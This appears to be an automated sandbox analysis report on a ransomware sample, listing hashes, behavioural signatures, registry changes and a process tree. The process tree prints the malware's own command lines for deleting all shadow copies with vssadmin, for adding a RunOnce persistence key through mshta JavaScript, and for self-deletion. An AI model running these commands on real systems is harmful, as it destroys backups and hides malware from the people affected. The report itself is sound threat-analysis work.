Analysis
- max time kernel: 273s
- max time network: 277s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 14-08-2021 02:17
- Static task: static1
- Behavioral task: behavioral1
  Sample: 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  Resource: win7v20210408
- Behavioral task: behavioral2
  Sample: 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  Resource: win10v20210410
General
- Target: 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
- Size: 256KB
- MD5: 156ed66fb7257ef1bdd6385c71e5aa83
- SHA1: 2d302323eab61e5791ab5ce2c6728e6708743bed
- SHA256: 028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560
- SHA512: c63a679abf8eb64ba4a722df4638249499d8ab9e6a94db5e3d39ab136afbe4cec563ff9698814170b12e55d5616865776273303e99a5b7e8742bc870ae5ebdb4
Malware Config
Signatures
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Blocklisted process makes network request (6 IoCs)
  Processes:
  flow  pid   process
  16    3272  mshta.exe
  17    3272  mshta.exe
  19    3272  mshta.exe
  20    3272  mshta.exe
  22    3272  mshta.exe
  24    3272  mshta.exe
- Executes dropped EXE (1 IoC)
  Processes:
  pid   process
  2820  trust.exe
- Modifies extensions of user files (1 IoC)
  Ransomware generally changes the extension on encrypted files.
  Processes:
  description                   ioc                                       process
  File opened for modification  C:\Users\Admin\Pictures\ReceiveWait.tiff  trust.exe
- Deletes itself (1 IoC)
  Processes:
  pid   process
  3712  mshta.exe
- Adds Run key to start application (2 TTPs, 4 IoCs)
  Processes:
  description      ioc  process
  Key created      \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce  mshta.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893} = "C:\\Users\\Admin\\AppData\\Local\\trust.exe"  mshta.exe
  Key created      \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run  trust.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\How to restore files = "mshta.exe \"C:\\Users\\Admin\\How to restore files.hta\""  trust.exe
- Drops desktop.ini file(s) (25 IoCs)
  Processes:
  description                   ioc  process
  File opened for modification  C:\Users\Admin\Contacts\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\OneDrive\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Pictures\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Searches\desktop.ini  trust.exe
  File opened for modification  C:\Users\Public\Music\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Desktop\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Documents\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Music\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Pictures\Saved Pictures\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Saved Games\desktop.ini  trust.exe
  File opened for modification  C:\$Recycle.Bin\S-1-5-21-3686645723-710336880-414668232-1000\desktop.ini  trust.exe
  File opened for modification  C:\Users\Public\Desktop\desktop.ini  trust.exe
  File opened for modification  C:\Users\Public\desktop.ini  trust.exe
  File opened for modification  C:\Users\Public\Downloads\desktop.ini  trust.exe
  File opened for modification  C:\Users\Public\Libraries\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Favorites\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Favorites\Links\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Pictures\Camera Roll\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Videos\desktop.ini  trust.exe
  File opened for modification  C:\Users\Public\Documents\desktop.ini  trust.exe
  File opened for modification  C:\Users\Public\Pictures\desktop.ini  trust.exe
  File opened for modification  C:\Users\Public\Videos\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Downloads\desktop.ini  trust.exe
  File opened for modification  C:\Users\Admin\Links\desktop.ini  trust.exe
  File opened for modification  C:\Users\Public\AccountPictures\desktop.ini  trust.exe
- Maps connected drives based on registry (3 TTPs, 4 IoCs)
  Disk information is often read in order to detect sandboxing environments.
  Processes:
  description        ioc  process
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0  trust.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum  trust.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
  pid   process
  3276  vssadmin.exe
- Kills process with taskkill (1 IoC)
  Processes:
  pid   process
  3600  taskkill.exe
- Suspicious behavior: EnumeratesProcesses (16 IoCs)
  Processes:
  pid   process
  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  2820  trust.exe
  2820  trust.exe
  2820  trust.exe
  2820  trust.exe
  2820  trust.exe
  2820  trust.exe
  2820  trust.exe
  2820  trust.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes:
  description                pid   process
  Token: SeBackupPrivilege   3940  vssvc.exe
  Token: SeRestorePrivilege  3940  vssvc.exe
  Token: SeAuditPrivilege    3940  vssvc.exe
  Token: SeDebugPrivilege    3600  taskkill.exe
- Suspicious use of FindShellTrayWindow (1 IoC)
  Processes:
  pid   process
  3272  mshta.exe
- Suspicious use of WriteProcessMemory (24 IoCs)
  Processes:
  description                       pid   process  target process
  PID 3912 wrote to memory of 2820  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe  trust.exe
  PID 3912 wrote to memory of 2820  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe  trust.exe
  PID 3912 wrote to memory of 2820  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe  trust.exe
  PID 3912 wrote to memory of 3712  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe  mshta.exe
  PID 3912 wrote to memory of 3712  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe  mshta.exe
  PID 3912 wrote to memory of 3712  3912  028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe  mshta.exe
  PID 2820 wrote to memory of 3564  2820  trust.exe  mshta.exe
  PID 2820 wrote to memory of 3564  2820  trust.exe  mshta.exe
  PID 2820 wrote to memory of 3564  2820  trust.exe  mshta.exe
  PID 2820 wrote to memory of 3276  2820  trust.exe  vssadmin.exe
  PID 2820 wrote to memory of 3276  2820  trust.exe  vssadmin.exe
  PID 2820 wrote to memory of 3276  2820  trust.exe  vssadmin.exe
  PID 2820 wrote to memory of 3272  2820  trust.exe  mshta.exe
  PID 2820 wrote to memory of 3272  2820  trust.exe  mshta.exe
  PID 2820 wrote to memory of 3272  2820  trust.exe  mshta.exe
  PID 2820 wrote to memory of 2160  2820  trust.exe  cmd.exe
  PID 2820 wrote to memory of 2160  2820  trust.exe  cmd.exe
  PID 2820 wrote to memory of 2160  2820  trust.exe  cmd.exe
  PID 2160 wrote to memory of 3600  2160  cmd.exe  taskkill.exe
  PID 2160 wrote to memory of 3600  2160  cmd.exe  taskkill.exe
  PID 2160 wrote to memory of 3600  2160  cmd.exe  taskkill.exe
  PID 2820 wrote to memory of 1860  2820  trust.exe  mshta.exe
  PID 2820 wrote to memory of 1860  2820  trust.exe  mshta.exe
  PID 2820 wrote to memory of 1860  2820  trust.exe  mshta.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe"
  Signatures:
  - Maps connected drives based on registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  Child processes:
  - C:\Users\Admin\AppData\Local\trust.exe
    Command line: "C:\Users\Admin\AppData\Local\trust.exe" runas
    Signatures:
    - Executes dropped EXE
    - Modifies extensions of user files
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Maps connected drives based on registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    Child processes:
    - C:\Windows\SysWOW64\mshta.exe
      Command line: mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{EE750B8B-8F1F-4FEB-B415-B9B0FDBD4893}','C:\\Users\\Admin\\AppData\\Local\\trust.exe');}catch(e){}},10);"
      Signatures:
      - Adds Run key to start application
    - C:\Windows\SysWOW64\vssadmin.exe
      Command line: vssadmin.exe Delete Shadows /All /Quiet
      Signatures:
      - Interacts with shadow copies
    - C:\Windows\SysWOW64\mshta.exe
      Command line: mshta.exe "C:\Users\Admin\How to restore files.hta"
      Signatures:
      - Blocklisted process makes network request
      - Suspicious use of FindShellTrayWindow
    - C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /C taskkill /PID 3564 /F
      Signatures:
      - Suspicious use of WriteProcessMemory
      Child processes:
      - C:\Windows\SysWOW64\taskkill.exe
        Command line: taskkill /PID 3564 /F
        Signatures:
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\SysWOW64\mshta.exe
      Command line: mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('C:\\Users\\Admin\\AppData\\Local\\trust.exe');close()}catch(e){}},10);"
  - C:\Windows\SysWOW64\mshta.exe
    Command line: mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('C:\\Users\\Admin\\AppData\\Local\\Temp\\028f0b1092caf4711857d0958bc798882c4ac9285895c3628f5be0c988f1d560.exe');close()}catch(e){}},10);"
    Signatures:
    - Deletes itself
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\rundll32.exe
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Windows\SysWOW64\mshta.exe
  Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\How to restore files.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads